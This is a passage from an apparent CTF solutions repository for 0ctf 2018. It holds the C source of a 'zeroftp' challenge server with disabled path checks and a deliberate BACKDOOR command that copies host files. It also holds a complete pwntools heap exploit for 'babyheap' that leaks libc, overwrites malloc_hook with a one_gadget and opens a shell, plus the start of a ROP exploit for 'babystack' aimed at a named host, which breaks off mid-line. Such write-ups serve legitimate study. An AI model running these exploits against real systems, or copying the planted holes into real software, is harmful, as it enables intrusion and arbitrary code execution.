zero_basic_free(zeroftp_arg1); break; case ZEROFTP_MKDIR: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *mkdir_pathname = ZERO_STRING_VAL(zeroftp_arg1); size_t mkdir_pathname_len = strlen(mkdir_pathname); //for (int i = 0; i < mkdir_pathname_len; i++) { // char victim = mkdir_pathname[i]; // if (!isalpha(victim) && !isdigit(victim) && victim != '_') { // goto LABEL_FAILED; // } //} #ifndef ZEROFS int mkdir_result = 0; #else int mkdir_result = zerofs_mkdir(mkdir_pathname, O_RDWR); #endif if (mkdir_result == 0) { zeroftp_result_bool(1); } else { goto LABEL_FAILED; } zero_basic_free(zeroftp_arg1); break; case ZEROFTP_RMDIR: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *rmdir_pathname = ZERO_STRING_VAL(zeroftp_arg1); #ifndef ZEROFS int rmdir_result = 0; #else int rmdir_result = zerofs_rmdir(rmdir_pathname); #endif if (rmdir_result == 0) { zeroftp_result_bool(1); } else { goto LABEL_FAILED; } zero_basic_free(zeroftp_arg1); break; case ZEROFTP_RDFILE: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *rd_pathname = ZERO_STRING_VAL(zeroftp_arg1); #ifndef ZEROFS size_t rd_filesize = strlen(rd_pathname); uint8_t *rd_buf = (uint8_t *)malloc(rd_filesize+0x10); CHECK_MALLOC(rd_buf, NULL); memcpy(rd_buf, rd_pathname, rd_filesize); #else int rd_fd = zerofs_open(rd_pathname, O_RDONLY); if (rd_fd < 0) { zero_basic_free(zeroftp_arg1); goto LABEL_FAILED; } size_t rd_filesize = zerofs_lseek(rd_fd, 0, SEEK_END); if (rd_filesize == -1) { zero_basic_free(zeroftp_arg1); goto LABEL_FAILED; } rd_filesize = MIN(rd_filesize, 0x800); zerofs_lseek(rd_fd, 0, SEEK_SET); uint8_t *rd_buf = (uint8_t *)malloc(rd_filesize+0x10); CHECK_MALLOC(rd_buf, NULL); int rd_result = zerofs_read(rd_fd, rd_buf, rd_filesize); #endif #ifdef PWN #else zerofs_close(rd_fd); #endif zeroftp_result_raw(rd_buf, rd_filesize); free(rd_buf); zero_basic_free(zeroftp_arg1); break; case ZEROFTP_WRFILE: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname // arg2 file_content unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } unpack_res = zero_unpack_raw(arg2, &arg3, &zeroftp_arg2); if (unpack_res == -1) { goto LABEL_FAILED; } char *wr_pathname = ZERO_STRING_VAL(zeroftp_arg1); char *wr_file_content = zeroftp_arg2->ptr; size_t wr_file_content_size = zeroftp_arg2->len; //for (int i = 0; i < strlen(wr_pathname); i++) { // char victim = wr_pathname[i]; // if (!isalpha(victim) && !isdigit(victim)) { // goto LABEL_FAILED; // } //} #ifndef ZEROFS size_t wr_result = wr_file_content_size; #else int wr_fd = zerofs_open(wr_pathname, O_WRONLY); if (wr_fd < 0) { zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); goto LABEL_FAILED; } size_t wr_result; wr_result = zerofs_write(wr_fd, wr_file_content, wr_file_content_size); #endif zerofs_close(wr_fd); zeroftp_result_int(wr_result); zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); break; case ZEROFTP_RMFILE: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *rmfile_pathname = ZERO_STRING_VAL(zeroftp_arg1); #ifndef ZEROFS int rmfile_result = 0; #else int rmfile_result = zerofs_unlink(rmfile_pathname); #endif if (rmfile_result == 0) { zeroftp_result_bool(1); } else { goto LABEL_FAILED; } zero_basic_free(zeroftp_arg1); break; case ZEROFTP_FILEINFO: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname // arg2 elem unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *fileinfo_pathname = ZERO_STRING_VAL(zeroftp_arg1); value_t fileinfo_type; fileinfo_type = (zerofs_elemget(fileinfo_pathname, FTYPE)); if (fileinfo_type.num == -1) { goto LABEL_FAILED; } value_t fileinfo_value_name; value_t fileinfo_value_type; value_t fileinfo_value_perm; value_t fileinfo_value_size; value_t fileinfo_value_ctime; value_t fileinfo_value_mtime; zero_basic_t **fileinfo_list; zero_basic_t *zero_fileinfo_tmp; if (fileinfo_type.num == NORMAL_FILE) { unpack_res = zero_unpack_bool(arg2, &arg3, &zeroftp_arg2); if (unpack_res == -1) { goto LABEL_FAILED; } if (ZERO_BOOL_VAL(zeroftp_arg2)) { unpack_res = zero_unpack_int(arg3, &arg4, &zeroftp_arg3); if (unpack_res == -1) { goto LABEL_FAILED; } uint64_t fileinfo_elem = ZERO_INT_VAL(zeroftp_arg3); value_t fileinfo_value; uint64_t fileinfo_num; char *fileinfo_ptr; switch(fileinfo_elem) { case FNAME: #ifndef ZEROFS fileinfo_value.ptr = "filefilefile"; #else fileinfo_value = (zerofs_elemget(fileinfo_pathname, FNAME)); size_t fileinfo_value_len = strlen(fileinfo_value.ptr); if (fileinfo_value_len > 0x800) { fileinfo_value_len = 0x800; fileinfo_value.ptr[0x800] = 0; } #endif zeroftp_result_string(fileinfo_value.ptr); break; case FTYPE: case FPERM: case FSIZE: case FCTIME: case FMTIME: #ifndef ZEROFS fileinfo_value.num = 0xdeadbeef; #else fileinfo_value = zerofs_elemget(fileinfo_pathname, fileinfo_elem); #endif zeroftp_result_int(fileinfo_value.num); break; default: goto LABEL_FAILED; } zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); zero_basic_free(zeroftp_arg3); } else { fileinfo_value_name = (zerofs_elemget(fileinfo_pathname, FNAME)); fileinfo_value_type = (zerofs_elemget(fileinfo_pathname, FTYPE)); fileinfo_value_perm = (zerofs_elemget(fileinfo_pathname, FPERM)); fileinfo_value_size = (zerofs_elemget(fileinfo_pathname, FSIZE)); fileinfo_value_ctime = (zerofs_elemget(fileinfo_pathname, FCTIME)); fileinfo_value_mtime = (zerofs_elemget(fileinfo_pathname, FMTIME)); fileinfo_list = (zero_basic_t **)malloc(sizeof(zero_basic_t *)*(7)); CHECK_MALLOC(fileinfo_list, NULL); zero_string_new(&zero_string_tmp, fileinfo_value_name.ptr); fileinfo_list[0] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_type.num, 1); fileinfo_list[1] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_perm.num, 1); fileinfo_list[2] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_size.num, 1); fileinfo_list[3] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_ctime.num, 1); fileinfo_list[4] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_mtime.num, 1); fileinfo_list[5] = zero_string_tmp; fileinfo_list[6] = NULL; zeroftp_result_list(fileinfo_list); free(fileinfo_list); zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); break; } } else { char **fileinfo_file_list = NULL; fileinfo_file_list = zerofs_list(fileinfo_pathname); size_t fileinfo_file_list_len = 0; PTRARRAY_LEN(fileinfo_file_list, fileinfo_file_list_len); zero_basic_t **zero_fileinfo_file_list = (zero_basic_t **)malloc(sizeof(zero_basic_t *)*(fileinfo_file_list_len+1)); CHECK_MALLOC(zero_fileinfo_file_list, NULL); for (int i = 0; i < fileinfo_file_list_len; i++) { fileinfo_value_name = (zerofs_elemget(fileinfo_file_list[i], FNAME)); fileinfo_value_type = (zerofs_elemget(fileinfo_file_list[i], FTYPE)); fileinfo_value_perm = (zerofs_elemget(fileinfo_file_list[i], FPERM)); fileinfo_value_size = (zerofs_elemget(fileinfo_file_list[i], FSIZE)); fileinfo_value_ctime = (zerofs_elemget(fileinfo_file_list[i], FCTIME)); fileinfo_value_mtime = (zerofs_elemget(fileinfo_file_list[i], FMTIME)); fileinfo_list = (zero_basic_t **)malloc(sizeof(zero_basic_t *)*(7)); CHECK_MALLOC(fileinfo_list, NULL); zero_string_new(&zero_string_tmp, fileinfo_value_name.ptr); fileinfo_list[0] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_type.num, 1); fileinfo_list[1] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_perm.num, 1); fileinfo_list[2] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_size.num, 1); fileinfo_list[3] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_ctime.num, 1); fileinfo_list[4] = zero_string_tmp; zero_int_new(&zero_string_tmp, fileinfo_value_mtime.num, 1); fileinfo_list[5] = zero_string_tmp; fileinfo_list[6] = NULL; zero_list_new(zero_fileinfo_file_list+i, fileinfo_list); } zero_fileinfo_file_list[fileinfo_file_list_len] = 0; zeroftp_result_list(zero_fileinfo_file_list); zero_basic_free(zeroftp_arg1); } break; case ZEROFTP_SETFILEINFO: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname // arg2 elem // arg3 value unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } unpack_res = zero_unpack_int(arg2, &arg3, &zeroftp_arg2); if (unpack_res == -1) { goto LABEL_FAILED; } char *setfileinfo_pathname = ZERO_STRING_VAL(zeroftp_arg1); uint64_t setfileinfo_elem = ZERO_INT_VAL(zeroftp_arg2); value_t setfileinfo_value; switch(setfileinfo_elem) { case FNAME: unpack_res = zero_unpack_string(arg3, &arg4, &zeroftp_arg3); if (unpack_res == -1) { goto LABEL_FAILED; } setfileinfo_value.ptr = ZERO_STRING_VAL(zeroftp_arg3); #ifndef ZEROFS #else zerofs_elemset(setfileinfo_pathname, FNAME, setfileinfo_value); #endif zeroftp_result_bool(1); break; //case FTYPE: case FPERM: //case FSIZE: case FCTIME: case FMTIME: unpack_res = zero_unpack_int(arg3, &arg4, &zeroftp_arg3); if (unpack_res == -1) { goto LABEL_FAILED; } setfileinfo_value.num = ZERO_INT_VAL(zeroftp_arg3); #ifndef ZEROFS #else zerofs_elemset(setfileinfo_pathname, setfileinfo_elem, setfileinfo_value); #endif zeroftp_result_bool(1); break; default: goto LABEL_FAILED; } zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); zero_basic_free(zeroftp_arg3); break; case ZEROFTP_BACKDOOR: if (!g_logined) { goto LABEL_FAILED; } // arg1 backdoor_filename unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *backdoor_pathname = ZERO_STRING_VAL(zeroftp_arg1); size_t backdoor_pathname_len = strlen(backdoor_pathname); /* check */ if(!is_regular_file(backdoor_pathname)) { goto LABEL_FAILED; } if (!isalpha(backdoor_pathname[0]) && !isdigit(backdoor_pathname[0])) { goto LABEL_FAILED; } if (backdoor_pathname_len > 1) { for (int i = 1; i < backdoor_pathname_len; i++) { char victim = backdoor_pathname[i]; if (!isalpha(victim) && !isdigit(victim) && victim != '_' && victim != '/') { goto LABEL_FAILED; } } } int backdoor_fd = open(backdoor_pathname, O_RDONLY); size_t backdoor_filesize = lseek(backdoor_fd, 0, SEEK_END); if (backdoor_filesize == -1) { goto LABEL_FAILED; } backdoor_filesize = MIN(backdoor_filesize, 0x800); lseek(backdoor_fd, 0, SEEK_SET); uint8_t *backdoor_filecontent = (uint8_t *)malloc(backdoor_filesize+0x10); CHECK_MALLOC(backdoor_filecontent, NULL); read(backdoor_fd, backdoor_filecontent, backdoor_filesize); /* write to vfs */ int backdoor_vfs_fd = zerofs_open(backdoor_pathname, O_WRONLY); if (backdoor_vfs_fd < 0) { goto LABEL_FAILED; } zerofs_write(backdoor_vfs_fd, backdoor_filecontent, backdoor_filesize); zerofs_close(backdoor_vfs_fd); zeroftp_result_bool(1); free(backdoor_filecontent); zero_basic_free(zeroftp_arg1); //zeroftp_result_raw(backdoor_filecontent, backdoor_filesize); break; case ZEROFTP_QUIT: exit(-1); break; default: LABEL_FAILED: zeroftp_result_bool(0); zero_basic_free(zeroftp_cmd); //exit(-1); return; } } else { exit(-1); } zero_basic_free(zeroftp_cmd); } #ifdef TEST_ZEROFTP_SAMPLE void zeroftp_main(uint8_t *packet) { uint32_t data_len; uint32_t data_crc32; uint32_t crc32; uint8_t *data; if(packet[0] != ZERO_MAGIC) { exit(-1); } data_len = ntohl(*((uint32_t *)&packet[ZERO_MAGIC_LEN])); data = &packet[ZERO_MAGIC_LEN+4]; data_crc32 = ntohl(*((uint32_t *)&packet[ZERO_MAGIC_LEN+4+data_len])); crc32 = crc32_compute(0, packet+ZERO_MAGIC_LEN+4, data_len); if (crc32 != data_crc32) { zeroftp_result_bool(0); exit(-1); } zeroftp_cmd_dispatcher(data, data_len); } #else void zeroftp_main() { uint32_t data_len; uint32_t data_crc32; uint32_t crc32; uint8_t *data; uint8_t magic; uint32_t rd; rd = ZERO_RECV(&magic, 1); if (magic != ZERO_MAGIC) { zeroftp_result_bool(0); exit(-1); } ZERO_RECV(&data_len, 4); data_len = ntohl(data_len); if (data_len >= 0x8000) { exit(-1); } data = (uint8_t *)malloc(data_len+0x10); memset(data, '0', data_len+0x8); CHECK_MALLOC(data, NULL); ZERO_RECV(data, data_len); ZERO_RECV(&data_crc32, 4); data_crc32 = ntohl(data_crc32); crc32 = crc32_compute(0, data, data_len); if (crc32 != data_crc32) { zeroftp_result_bool(0); exit(-1); } zeroftp_cmd_dispatcher(data, data_len); free(data); } void zeroftp_loop() { while (1) { zeroftp_main(); } } #endif #ifdef TEST_ZEROFTP_SAMPLE uint8_t *zeroftp_build_sample_login() { zero_basic_t *zero_cmd; zero_basic_t *zero_username; zero_basic_t *zero_password; zero_int_new(&zero_cmd, ZEROFTP_LOGIN, 1); zero_string_new(&zero_username, "admin"); zero_raw_new(&zero_password, "\x21\x23\x2f\x29\x7a\x57\xa5\xa7\x43\x89\x4a\x0e\x4a\x80\x1f\xc3", 0x10); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_username, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_password, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_ls(char *pathname) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_int_new(&zero_cmd, ZEROFTP_LS, 1); zero_string_new(&zero_pathname, pathname); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_rdfile(char *pathname) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_int_new(&zero_cmd, ZEROFTP_RDFILE, 1); zero_string_new(&zero_pathname, pathname); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_wrfile(char *pathname, char *file_content, size_t len) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_basic_t *zero_filecontent; zero_int_new(&zero_cmd, ZEROFTP_WRFILE, 1); zero_string_new(&zero_pathname, pathname); zero_raw_new(&zero_filecontent, file_content, len); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_filecontent, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //zero_hexdump(buf, buf_tmp2+4-buf); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_fileinfo1(char *pathname) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_basic_t *zero_elem_enable; zero_basic_t *zero_elem; zero_int_new(&zero_cmd, ZEROFTP_FILEINFO, 1); zero_string_new(&zero_pathname, pathname); zero_bool_new(&zero_elem_enable, 1); zero_int_new(&zero_elem, FNAME, 1); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem_enable, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_fileinfo2(char *pathname) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_basic_t *zero_elem_enable; zero_basic_t *zero_elem; zero_int_new(&zero_cmd, ZEROFTP_FILEINFO, 1); zero_string_new(&zero_pathname, pathname); zero_bool_new(&zero_elem_enable, 0); zero_int_new(&zero_elem, FNAME, 1); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem_enable, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_fileinfo3(char *pathname) { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_basic_t *zero_elem_enable; zero_basic_t *zero_elem; zero_int_new(&zero_cmd, ZEROFTP_FILEINFO, 1); zero_string_new(&zero_pathname, pathname); zero_bool_new(&zero_elem_enable, 1); zero_int_new(&zero_elem, FNAME, 1); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem_enable, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_setfileinfo() { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_basic_t *zero_elem; zero_basic_t *zero_value_ptr; zero_basic_t *zero_value_num; zero_int_new(&zero_cmd, ZEROFTP_SETFILEINFO, 1); zero_string_new(&zero_pathname, "./flag"); zero_int_new(&zero_elem, FNAME, 1); zero_string_new(&zero_value_ptr, "flag2"); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_elem, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_value_ptr, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } uint8_t *zeroftp_build_sample_backdoor() { zero_basic_t *zero_cmd; zero_basic_t *zero_pathname; zero_int_new(&zero_cmd, ZEROFTP_BACKDOOR, 1); zero_string_new(&zero_pathname, "flag"); uint8_t *buf = malloc(0x1000); memset(buf, '\x0', 0x1000); uint8_t *buf_tmp1, *buf_tmp2; buf_tmp1 = buf+5; zero_pack(zero_cmd, buf_tmp1, &buf_tmp2); buf_tmp1 = buf_tmp2; zero_pack(zero_pathname, buf_tmp1, &buf_tmp2); buf[0] = '\xdd'; size_t data_len = buf_tmp2-buf-4-ZERO_MAGIC_LEN; *((uint32_t *)&buf[ZERO_MAGIC_LEN]) = htonl(data_len); uint32_t crc32; crc32 = crc32_compute(0, buf+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&buf[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); //write(1, buf, buf_tmp2+4-buf); return buf; } void zeroftp_test() { LOG("[*] LOGIN TEST\n"); char *buf = zeroftp_build_sample_login(); zeroftp_main(buf); LOG("[*] WRITE FILE TEST\n"); buf = zeroftp_build_sample_wrfile("flag1", "AAAAAAAA", 8); zeroftp_main(buf); buf = zeroftp_build_sample_wrfile("flag2", "BBBBBBBB", 8); zeroftp_main(buf); LOG("[*] LS TEST\n"); buf = zeroftp_build_sample_ls("/"); zeroftp_main(buf); LOG("[*] READ FILE TEST\n"); buf = zeroftp_build_sample_rdfile("/flag1"); zeroftp_main(buf); LOG("[*] FILEINFO TEST 1\n"); buf = zeroftp_build_sample_fileinfo1("./flag"); zeroftp_main(buf); LOG("[*] FILEINFO TEST 2\n"); buf = zeroftp_build_sample_fileinfo2("./flag"); zeroftp_main(buf); LOG("[*] FILEINFO TEST 3\n"); buf = zeroftp_build_sample_fileinfo3("."); zeroftp_main(buf); //LOG("[*] SETFILEINFO TEST\n"); //buf = zeroftp_build_sample_setfileinfo(); //zeroftp_main(buf); //LOG("[*] FILEINFO TEST\n"); //buf = zeroftp_build_sample_fileinfo("./flag2"); //zeroftp_main(buf); //LOG("[*] BACKDOOR TEST\n"); //buf = zeroftp_build_sample_backdoor(); //zeroftp_main(buf); } #endif void sigalrm_fn(int sig) { printf("%s", "\n[!] bye!"); exit(-1); } void initial() { signal(SIGALRM, sigalrm_fn); //alarm(0x10000); alarm(0x3c); setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); } int main(int argc, char const* argv[]) { #ifdef SERVER init_dh(); init_rc4(); #endif //zeroftp_main("AAAA"); #ifdef TEST_ZEROFTP_SAMPLE zeroftp_test(); #else initial(); zeroftp_loop(); #endif return 0; } ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zeroftp.h ================================================ #ifndef ZEROFTP_H #define ZEROFTP_H #endif ================================================ FILE: 2018/0ctf-quals-2018/pwn/babyheap/solve_babyheap.py ================================================ from pwn import * context(log_level='debug') DEBUG=1 if DEBUG: p=process('./babyheap')#,env={"LD_PRELOAD":"./libc-2.24.so"},aslr=False) # gdb.attach(p) # p.interactive() else: p=remote() def alloc(size): p.recvuntil('Command:') p.sendline('1') p.recvuntil('Size:') p.sendline(str(size)) def update(index,size,content): p.recvuntil('Command:') p.sendline('2') p.recvuntil('Index:') p.sendline(str(index)) p.recvuntil('Size:') p.sendline(str(size)) p.recvuntil('Content:') p.send(content) def delete(index): p.recvuntil('Command:') p.sendline('3') p.recvuntil('Index:') p.sendline(str(index)) def view(index): p.recvuntil('Command:') p.sendline('4') p.recvuntil('Index') p.sendline(str(index)) p.recvuntil(']: ') return p.recvline() def main(): alloc(0x18)#0x00 alloc(0x18)#0x20 alloc(0x18)#0x40 alloc(0x18)#0x60 alloc(0x48)#0x80 alloc(0x58)#0xd0 alloc(0x58)#0x130 update(0,0x19,'0'*0x18+'\x61') delete(1) alloc(0x58)#0x20 update(1,0x58,p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p64(0)*3) delete(3) delete(2) heapbase=u64(view(1)[0x20:0x28])-0x60 alloc(0x18)#0x40 update(1,0x20,p64(0)*3+p64(0x91)) delete(6) delete(2) libcbase=u64(view(1)[0x20:0x28])-0x3c4b78 alloc(0x48)#0x40 delete(2) # alloc(0x18) if DEBUG: main_arena=0x3C4B20 free_hook=0x3C67A8 malloc_hook=0x3C4B10 else: main_arena=0x399B00 free_hook=0x39B788 malloc_hook=0x399AF0 update(1,0x30,p64(0)*3+p64(0x51)+p64(libcbase+main_arena+0x25)*2) alloc(0x48) alloc(0x48) log.success('libcbase: 0x%x heapbase: 0x%x'%(libcbase,heapbase)) update(3,0x80-0x55,'\x00'*(0x78-0x55)+p64(libcbase+malloc_hook-0x18)) alloc(0x48) one_gadget=0x45216 one_gadget=0x4526a update(6,0x10,p64(0)+p64(one_gadget+libcbase)) # gdb.attach(p,'vm\n') alloc(0x40) # update() ''' update(3,0x80-0x55,'\x00'*(0x78-0x55)+p64(libcbase+free_hook-0xb58)) update(1,0x50,p64(0)*3+p64(0x31)+p64(0)*5+p64(0xbeef)) for j in range(10): for i in range(10-j): print i,'---------------------------' alloc(0x48) for i in range(14-j,5,-1): print '-----------------------',i delete(i) delete(2) update(1,0x20,p64(0)*3+p64(0x51)) alloc(0x48) print '-----------------',j view(1) ''' p.interactive() if __name__=='__main__': main() pass ================================================ FILE: 2018/0ctf-quals-2018/pwn/babystack/solve_babystack_ref.py ================================================ #!/usr/bin/python import sys, string sys.path.append("/home/cpegg/roputils") from pwn import * from roputils import * import itertools from hashlib import sha256 LOCAL = True LOCALIP = "172.0.0.1" HOST = "202.120.7.202" PORT = 6666 addr_bss = 0x0804a100 charset = string.letters+string.digits rop = ROP("./babystack") r = process("./babystack") # jmprel = r.dynamic('JMPREL') # relent = r.dynamic('RELENT') # symtab = r.dynamic('SYMTAB') # syment = self.dynamic('SYMENT') # strtab = self.dynamic('STRTAB') # log.info("STRTAB: " + hex(STRTAB)) # log.info("SYMTAB: " + hex(SYMTAB)) # log.info("JMPREL: " + hex(JMPREL)) gdb.attach(r,'b *0x8048451\nc') def calcpow(chal): for combo in itertools.combinations_with_replacement(string.letters+string.digits,4): sol = ''.join(combo) if sha256(chal + sol).digest().startswith("\0\0\0"): return sol return None def get_connection(): return remote("localhost", 6666) if LOCAL else remote(HOST, PORT) def exploit(r): log.info("Solve pow ") sol = None if not LOCAL: while sol == None: r = get_connection() sol = calcpow(r.recvline().strip()) if sol == None: r.close() r.send(sol) log.info("Stage1: Prepare bigger read 